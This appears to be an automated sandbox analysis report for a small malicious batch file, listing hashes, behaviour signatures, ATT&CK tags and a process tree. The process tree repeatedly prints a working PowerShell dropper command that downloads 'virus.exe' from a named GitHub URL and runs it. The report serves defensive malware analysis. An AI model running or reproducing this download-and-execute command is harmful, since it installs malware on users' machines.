fbb6befab51fcdab9f44079729dd959caecbe24975dfe212e921ec08e5c45f48

Analysis

max time kernel
145s
max time network
121s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
10-12-2024 23:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test.bat
Size

2KB
MD5

83834b6e8e0b6ccea0df9ed0c91ecbc9
SHA1

6f706a5d11739d2ebb52a1c15732341db0229b2d
SHA256

fbb6befab51fcdab9f44079729dd959caecbe24975dfe212e921ec08e5c45f48
SHA512

aac78c21a40dfbd0656dcdc47b0a4b9a65b5abaf3097178eae1ae185bfaabbb4aab3f2f722114032bb04559e6978706ba4b6a0c4e10ecf5d8a76391286ac064e

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 29 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2468	powershell.exe
892	powershell.exe
2216	powershell.exe
2500	powershell.exe
2080	powershell.exe
2116	powershell.exe
2964	powershell.exe
868	powershell.exe
1416	powershell.exe
2740	powershell.exe
2232	powershell.exe
340	powershell.exe
1192	powershell.exe
2460	powershell.exe
2244	powershell.exe
576	powershell.exe
1920	powershell.exe
2472	powershell.exe
1644	powershell.exe
2188	powershell.exe
1320	powershell.exe
1304	powershell.exe
1592	powershell.exe
3044	powershell.exe
1248	powershell.exe
2576	powershell.exe
948	powershell.exe
2104	powershell.exe
108	powershell.exe

Delays execution with timeout.exe 29 IoCs

evasion

pid	Process
2148	timeout.exe
2380	timeout.exe
2864	timeout.exe
1412	timeout.exe
2184	timeout.exe
2248	timeout.exe
2852	timeout.exe
1252	timeout.exe
1876	timeout.exe
496	timeout.exe
2092	timeout.exe
2068	timeout.exe
2016	timeout.exe
2152	timeout.exe
2200	timeout.exe
2772	timeout.exe
1232	timeout.exe
2872	timeout.exe
2388	timeout.exe
604	timeout.exe
2940	timeout.exe
768	timeout.exe
388	timeout.exe
2880	timeout.exe
2664	timeout.exe
2976	timeout.exe
3020	timeout.exe
308	timeout.exe
2208	timeout.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
2460	powershell.exe
2468	powershell.exe
2472	powershell.exe
2964	powershell.exe
2104	powershell.exe
3044	powershell.exe
1248	powershell.exe
108	powershell.exe
2244	powershell.exe
2216	powershell.exe
576	powershell.exe
2576	powershell.exe
868	powershell.exe
2500	powershell.exe
892	powershell.exe
1644	powershell.exe
2080	powershell.exe
2188	powershell.exe
2740	powershell.exe
2232	powershell.exe
1416	powershell.exe
948	powershell.exe
340	powershell.exe
2116	powershell.exe
1920	powershell.exe
1192	powershell.exe
1320	powershell.exe
1304	powershell.exe
1592	powershell.exe

Suspicious use of AdjustPrivilegeToken 29 IoCs

description	pid	Process
Token: SeDebugPrivilege	2460	powershell.exe
Token: SeDebugPrivilege	2468	powershell.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	2964	powershell.exe
Token: SeDebugPrivilege	2104	powershell.exe
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeDebugPrivilege	1248	powershell.exe
Token: SeDebugPrivilege	108	powershell.exe
Token: SeDebugPrivilege	2244	powershell.exe
Token: SeDebugPrivilege	2216	powershell.exe
Token: SeDebugPrivilege	576	powershell.exe
Token: SeDebugPrivilege	2576	powershell.exe
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	892	powershell.exe
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeDebugPrivilege	2740	powershell.exe
Token: SeDebugPrivilege	2232	powershell.exe
Token: SeDebugPrivilege	1416	powershell.exe
Token: SeDebugPrivilege	948	powershell.exe
Token: SeDebugPrivilege	340	powershell.exe
Token: SeDebugPrivilege	2116	powershell.exe
Token: SeDebugPrivilege	1920	powershell.exe
Token: SeDebugPrivilege	1192	powershell.exe
Token: SeDebugPrivilege	1320	powershell.exe
Token: SeDebugPrivilege	1304	powershell.exe
Token: SeDebugPrivilege	1592	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1372 wrote to memory of 2460	1372	cmd.exe	31
PID 1372 wrote to memory of 2460	1372	cmd.exe	31
PID 1372 wrote to memory of 2460	1372	cmd.exe	31
PID 1372 wrote to memory of 388	1372	cmd.exe	32
PID 1372 wrote to memory of 388	1372	cmd.exe	32
PID 1372 wrote to memory of 388	1372	cmd.exe	32
PID 1372 wrote to memory of 2468	1372	cmd.exe	33
PID 1372 wrote to memory of 2468	1372	cmd.exe	33
PID 1372 wrote to memory of 2468	1372	cmd.exe	33
PID 1372 wrote to memory of 2852	1372	cmd.exe	34
PID 1372 wrote to memory of 2852	1372	cmd.exe	34
PID 1372 wrote to memory of 2852	1372	cmd.exe	34
PID 1372 wrote to memory of 2472	1372	cmd.exe	36
PID 1372 wrote to memory of 2472	1372	cmd.exe	36
PID 1372 wrote to memory of 2472	1372	cmd.exe	36
PID 1372 wrote to memory of 2872	1372	cmd.exe	37
PID 1372 wrote to memory of 2872	1372	cmd.exe	37
PID 1372 wrote to memory of 2872	1372	cmd.exe	37
PID 1372 wrote to memory of 2964	1372	cmd.exe	38
PID 1372 wrote to memory of 2964	1372	cmd.exe	38
PID 1372 wrote to memory of 2964	1372	cmd.exe	38
PID 1372 wrote to memory of 1252	1372	cmd.exe	39
PID 1372 wrote to memory of 1252	1372	cmd.exe	39
PID 1372 wrote to memory of 1252	1372	cmd.exe	39
PID 1372 wrote to memory of 2104	1372	cmd.exe	40
PID 1372 wrote to memory of 2104	1372	cmd.exe	40
PID 1372 wrote to memory of 2104	1372	cmd.exe	40
PID 1372 wrote to memory of 2016	1372	cmd.exe	41
PID 1372 wrote to memory of 2016	1372	cmd.exe	41
PID 1372 wrote to memory of 2016	1372	cmd.exe	41
PID 1372 wrote to memory of 3044	1372	cmd.exe	42
PID 1372 wrote to memory of 3044	1372	cmd.exe	42
PID 1372 wrote to memory of 3044	1372	cmd.exe	42
PID 1372 wrote to memory of 2880	1372	cmd.exe	43
PID 1372 wrote to memory of 2880	1372	cmd.exe	43
PID 1372 wrote to memory of 2880	1372	cmd.exe	43
PID 1372 wrote to memory of 1248	1372	cmd.exe	44
PID 1372 wrote to memory of 1248	1372	cmd.exe	44
PID 1372 wrote to memory of 1248	1372	cmd.exe	44
PID 1372 wrote to memory of 2664	1372	cmd.exe	45
PID 1372 wrote to memory of 2664	1372	cmd.exe	45
PID 1372 wrote to memory of 2664	1372	cmd.exe	45
PID 1372 wrote to memory of 108	1372	cmd.exe	46
PID 1372 wrote to memory of 108	1372	cmd.exe	46
PID 1372 wrote to memory of 108	1372	cmd.exe	46
PID 1372 wrote to memory of 2388	1372	cmd.exe	47
PID 1372 wrote to memory of 2388	1372	cmd.exe	47
PID 1372 wrote to memory of 2388	1372	cmd.exe	47
PID 1372 wrote to memory of 2244	1372	cmd.exe	48
PID 1372 wrote to memory of 2244	1372	cmd.exe	48
PID 1372 wrote to memory of 2244	1372	cmd.exe	48
PID 1372 wrote to memory of 2152	1372	cmd.exe	49
PID 1372 wrote to memory of 2152	1372	cmd.exe	49
PID 1372 wrote to memory of 2152	1372	cmd.exe	49
PID 1372 wrote to memory of 2216	1372	cmd.exe	50
PID 1372 wrote to memory of 2216	1372	cmd.exe	50
PID 1372 wrote to memory of 2216	1372	cmd.exe	50
PID 1372 wrote to memory of 2200	1372	cmd.exe	51
PID 1372 wrote to memory of 2200	1372	cmd.exe	51
PID 1372 wrote to memory of 2200	1372	cmd.exe	51
PID 1372 wrote to memory of 576	1372	cmd.exe	52
PID 1372 wrote to memory of 576	1372	cmd.exe	52
PID 1372 wrote to memory of 576	1372	cmd.exe	52
PID 1372 wrote to memory of 604	1372	cmd.exe	53

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\test.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1372
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2460
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:388
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2468
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2472
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2872
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2964
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:1252
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2104
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3044
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2880
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1248
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2664
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:108
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2388
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2244
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2152
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2216
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2200
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:576
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:604
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2576
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:1876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:868
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2148
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2500
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:496
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:892
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1644
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2080
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2188
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2864
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2740
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2772
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2232
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:1412
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1416
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:948
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:3020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:340
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2068
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2116
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:1232
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1920
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1192
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1320
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1304
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2248
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"$env:Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1592
- C:\Windows\system32\timeout.exe
  timeout /t 5
  2⤵
  - Delays execution with timeout.exe
  PID:2208

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
1f39a1c6baf3aeb26e9b3ba2a7d2e2dc

SHA1
06a7f870e673638d3d71adbe4d45fdf5d37b26ff

SHA256
10873f4d67811cf4dae0ee8b0b564a1cd5f1358f13bacce1a765f7e55b0a5c59

SHA512
68e34bafb609629e69086fcb2790e88b06f60d7c0fc2ef35d1b173913477bcbdc8be2ce4ba989ecb2a6afbe5991df92e1fb020843d0d6455b365ecb95eb72388

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8c2447eb02a05fdd6bfff873a32df288

SHA1
3908b68d2cc39dc096a2086eb819929fd7772e51

SHA256
5f6bfa75c7428d796a5919aa15c6012fe4f631dfa1b485dc1d94a85de5e90465

SHA512
29a604ef1e0202006f439573fa7683e3c1c797f92f128e1ca6e300180cc56a68bd1fa588ef1b499dedc4d57f4b22a73d2bfadaa2c381fa918bcd39f375f42d21

Download Submit
memory/2460-7-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

Filesize
9.6MB

Download
memory/2460-8-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

Filesize
9.6MB

Download
memory/2460-10-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

Filesize
9.6MB

Download
memory/2460-11-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

Filesize
9.6MB

Download
memory/2460-9-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

Filesize
9.6MB

Download
memory/2460-12-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

Filesize
9.6MB

Download
memory/2460-4-0x000007FEF62DE000-0x000007FEF62DF000-memory.dmp

Filesize
4KB

Download
memory/2460-6-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

Filesize
32KB

Download
memory/2460-5-0x000000001B740000-0x000000001BA22000-memory.dmp

Filesize
2.9MB

Download
memory/2468-19-0x0000000001F80000-0x0000000001F88000-memory.dmp

Filesize
32KB

Download
memory/2468-18-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download